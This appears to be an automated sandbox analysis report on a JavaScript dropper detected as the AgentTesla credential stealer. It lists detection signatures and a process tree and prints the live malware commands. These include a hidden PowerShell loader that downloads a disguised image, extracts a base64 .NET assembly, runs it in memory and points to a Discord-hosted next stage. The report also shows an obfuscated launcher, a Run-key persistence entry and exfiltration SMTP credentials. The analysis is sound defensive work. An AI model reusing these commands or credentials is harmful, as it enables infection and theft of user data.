Windows Analysis Report
RFQ448903423_MAT_HASUE_de_Mexico.js

Overview

General Information

Sample name: RFQ448903423_MAT_HASUE_de_Mexico.js
Analysis ID: 1499556
MD5: dc966ae12a9be2e08487ced17081dc04
SHA1: 4e500a3a745dc042ee6d480152454ed4b6a15a93
SHA256: 21c71c210183e6046dfc4932d8f87c7d3acc167c9c5e363e8a9f1b6c2d5dd993
Tags: js

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected MSILDownloaderGeneric
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 652 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • InstallUtil.exe (PID: 7152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • InstallUtil.exe (PID: 1632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
Source | Rule | Description | Author | Strings
00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
4.2.powershell.exe.1ce9038cb90.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.powershell.exe.1ce9038cb90.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.powershell.exe.1ce9038cb90.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x33d0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33d81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33e0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33e9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33f07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33f79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3400f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3409f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author | Strings
amsi64_1964.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]'
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: (identical to Command), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]'
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]'
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]'
                      Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", ProcessId: 652, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? 
? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
                      Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\padral.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1964, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", ProcessId: 6784, ProcessName: cmd.exe
                      Source: Network Connection, Author: frack113: Data: DestinationIp: 185.230.212.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 1632, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = 
$imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = 
$endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", ProcessId: 652, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 